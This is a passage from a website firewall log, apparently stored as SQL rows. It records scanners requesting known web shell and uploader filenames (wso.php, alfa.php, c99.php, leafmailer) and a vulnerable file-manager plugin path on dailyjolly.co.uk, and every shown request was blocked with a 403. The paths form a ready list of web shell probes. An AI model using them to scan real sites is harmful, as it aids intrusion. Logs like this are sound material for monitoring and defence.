Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','g9jtPZ1TiW0G4EnzNAvp7RKD',0,1674674224.5554,225,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','kpuH4ryo3PAgaJOqxItv7Thl',0,1674674226.7175,169,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/ru.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','nFN9xmjSBTQ2VLPwJMWRipEd',0,1674674228.8517,192,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','5Xkfv1SB9LDyI4Rhq6dxuEt0',0,1674674230.9977,230,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tFLqsEYAg50yP7BUST9Icwna',0,1674674233.2090,298,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','7W0OxgP9ufLwTjstcyX2Uphm',0,1674674235.5186,178,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/skipper.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','fqLt1P4iSVbWKy7JsrIHZxgk',0,1674674237.6455,171,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/skippershell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','HQ8sMtq5cLD7eaiC2ElpnGTb',0,1674674239.7800,224,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/tttt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','BixqCjw1tKsGrSavDEyncXoF',0,1674674241.9553,186,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/tshop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','M2TgAvDeZQYpGsEdkWR8NO67',0,1674674244.0993,170,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','73XTaiIOoWxU29G6uqSw5zDc',0,1674674246.2142,177,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tj6eBAfx5ZlMgdR4kTHuyhbP',0,1674674248.3303,165,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/inje3ctor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2rzD6iuvIlWoGpc9hFxJgORA',0,1674674250.4618,177,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/saudi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JXCcTh4835ewlBDVmkPx9GtW',0,1674674252.5840,197,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','sI4iC1vtoTQjWZe0b3hYVXFB',0,1674674254.7266,173,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/alfashell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','7wPyumJ1Ct4IiAS5XlcgWZph',0,1674674256.8524,185,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/my_alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','53RFGq9YyB4isDHXA8cIl7EV',0,1674674258.9873,175,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','y3tHSB9VQZ5lkdjI1GUx7mEq',0,1674674261.1355,207,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','JRw70e9G2iUXHbLQN8BTZCIK',0,1674674263.3177,186,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/hacked.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','CjXaQNeDgPvlUuMIf8pS9HJL',0,1674674265.4401,385,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OYmMFHCKjdTtbiG6kP3p7agS',0,1674674267.8127,256,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','eSdV5jsKN60PIovc27DnCqQU',0,1674674270.0048,186,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/Navir.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','ZOwfIbUc70BSvatVHQ4jDqGN',0,1674674272.1390,225,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/cmd13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KYbnMHdy7i5mVpBu0t1rljaF',0,1674674274.2991,201,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/inc20k1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','UjlzZ4oN9RmprIgQHxVhqEBO',0,1674674276.4735,196,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','H8JcaZPeCGIEnSrjhlgR7LyX',0,1674674278.6237,242,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','jcgoLlRpsNEZS2A3vwQ1eIbu',0,1674674280.8189,202,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/swm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','HMpRYF5U7ZQu39ksgNzdeS1L',0,1674674282.9782,204,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','szp9LGBUuV3qO7DPZWhJdHQt',0,1674674285.1372,208,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','VxBh4bkIgNHpWQS3qnouFvfi',0,1674674287.3077,167,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','94K73A2ZXoNOIkmswvWxRrVg',0,1674674289.4041,174,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','NO2Qq5RuSI70tGpVfXsWre3Z',0,1674674291.5982,189,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','2puILEnTDWFzUmZHv3lb7tj5',0,1674674293.7656,170,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','mSLj9eX0RcUIiHQqA3oszkh8',0,1674674295.8850,190,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/LEAF.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','aO4VeDwyI5ZKpErduNYJUMqh',0,1674674298.0492,169,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','MBTlDWV8asRqCKtvSwdyL165',0,1674674300.1541,173,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','0gvfOVLyao2lq6nIKw5RsxMB',0,1674674302.3274,196,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','o4Jab5hgwEv2YzeMPWNOCTsZ',0,1674674304.4795,211,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/Leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','xHrvRDo7bJd9ZuWSwPa2GCVt',0,1674674306.6428,172,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','qO9R3uPQg7pl4TGVIjBXymzd',0,1674674308.7724,182,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','dVjC9sih8N0tMZ2YbXxGFAeU',0,1674674310.9302,182,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','hWxSbAqJaX7Gv3eznILdH5sC',0,1674674313.0898,158,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','e5YdnbjJoOfPmZ0tpvcqlxDT',0,1674674315.2277,156,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','9R0gIcLpfPKq2FuBaAQzwU7m',0,1674674317.3249,233,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','se3NzgGx5fYQu87khSPLaBEc',0,1674674319.5086,168,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','uyvqX6Y74oshzVAxGDHQF19O',0,1674674321.6520,165,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XMQRFhBJY7vp5m0rkiaVqyO9',0,1674674323.7551,162,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Yc4SEd8JCtqZQeHyW7vin6rX',0,1674674325.8951,209,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','tFSBIfLdZRYDGOX7e5W3E0yq',0,1674674328.0512,238,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/gaza.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','S9h5KByM2R1sCmj7YQnOuJUH',0,1674674330.2903,192,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','EvlwedV2hfaxy7j5sHLcq4JY',0,1674674332.4284,170,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','OxTQ24LHJfY6srWcBSDZVhlp',0,1674674334.5583,200,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','Uz5svTA7mFbudXQxpPKiwlYO',0,1674674336.7149,168,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','dtaejTLyO3IcZCBsF9R8u6DJ',0,1674674338.8420,184,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','cBX1ahTpqWAEDmKIdHe6z0jV',0,1674674340.9753,165,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','XJtkZpuvsogySIm2lfRcYUh5',0,1674674343.0683,497,'','GET',403,0,700,0,1,'',0),('3.26.169.116',52078964,'','https://www.dailyjolly.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\",\"2\":\"https:\\/\\/www.google.com\"}','KPvwdalS9Og3tpXneHiqjLVQ',0,1674674345.5198,206,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','WpUL5xJsqcw42tIDRT9kdS0a',0,1674716238.7730,261,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/uploads/2021/12/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','3cOud1fY8bNGHljMCJIAKSkg',0,1674716241.3523,227,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/doc.php','','{\"1\":\"python-requests\\/2.26.0\"}','C0iJbRtuK8e4V5aUXqsBSkgp',0,1674716244.2599,173,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/shells.php','','{\"1\":\"python-requests\\/2.26.0\"}','x7lW4XnvPJh3zOpDRiKwgIjb',0,1674716245.2871,168,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','IbeNsKWZHo9Mh2F0OA78gvLB',0,1674716249.1057,190,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-admin/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','zyQ4ZaoMvPXAJL5rWYhBT3jn',0,1674716250.1684,175,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','E3hpVT6JgQHOy7LoMkjbAmKN',0,1674716250.8938,165,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-includes/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','vln0eXwZt9qJQ2RTN3Fi4K7o',0,1674716252.0154,186,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','6bzkhS0q7etiD2MOcYT8l1A9',0,1674716254.1961,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','IM4TWvOKC32u6HrDs8ZqY1Nm',0,1674716255.2400,198,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','wDaCGLn1QR4NZz06VgEAWkdl',0,1674716256.0575,160,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-includes/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','WV1Yy7lXZPmGgqJtLiavQhrO',0,1674716257.7627,161,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','62lPF1zyROKUcGxubZWwBhkD',0,1674716258.4474,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-admin/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','bfoMxNlyHkZinQjg687aDvze',0,1674716259.1541,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"python-requests\\/2.26.0\"}','DnXsv742BwcifjHCVA8PmLrN',0,1674716259.7851,171,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.26.0\"}','s1jVaYn24BblyJFWoKhX8xiT',0,1674716260.5940,169,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.26.0\"}','XDV4UdR63mvQgSG25r9s1pzP',0,1674716261.9792,206,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','7o5eA1E4TkQIWlM2FsjCwGgJ',0,1674716263.8133,207,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"python-requests\\/2.26.0\"}','FEfLXyUmZ9hnY2MeQISAbVdT',0,1674716265.6297,165,'','GET',403,0,700,0,1,'',0),('109.248.175.137',1845014409,'','https://www.dailyjolly.co.uk/bala.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','bwpyrYEFK1tG65mvkeRxMQXV',0,1674721436.0622,232,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','6eXOU8oEaFwG5l3ANji1MB0n',0,1674729492.7939,184,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','FeMHR6sxydUXo0YtGvWciL1E',0,1674729494.6477,179,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','LN6UrIaJ0oum49de3QltPHfO',0,1674729495.5727,172,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','uObXGe7Nj9sDk6pvcZFJ8M5V',0,1674729497.1379,177,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.27.1\"}','jVBXZ4FAcqky0YLf5z3teCEU',0,1674729498.3360,198,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.27.1\"}','1gVB6YlpyvEjkodNOLJUPX5z',0,1674729500.7668,189,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','Us0wi3XtZDz7yBa6cS1eRgHd',0,1674729503.9775,201,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','0ei9gTD2FMtmCEvRwxBPoJhc',0,1674729505.4765,194,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','VZtcL1DETz6Rdeix2umnMFbB',0,1674729507.6856,186,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','aw0A5hU12DrNWMiLs3pb8Iv4',0,1674729511.7043,178,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','xMBsC8yiDbpWveK3gok2T90U',0,1674729514.3153,185,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','eMGftmxPFEhUpJaTlzdyKRB2',0,1674729524.3065,224,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','z5YFVayg9fWjLebOHlZxw4P7',0,1674729525.7243,173,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','QEFsL26KZ09rGSp1TueVw4qt',0,1674729529.2938,168,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','B61SkRI7CK4piEe2bOLaH5F9',0,1674729536.1267,196,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','FdmZklcLBfJME0gDvrxRpUH4',0,1674729540.0002,215,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','UyYPKMTVJ0heAuD6GifZOlkQ',0,1674729548.0269,562,'','GET',403,0,700,0,1,'',0),('196.74.207.174',3293237166,'','https://www.dailyjolly.co.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','1OBxLjnE5Hdf7tY2VJbCRzrw',0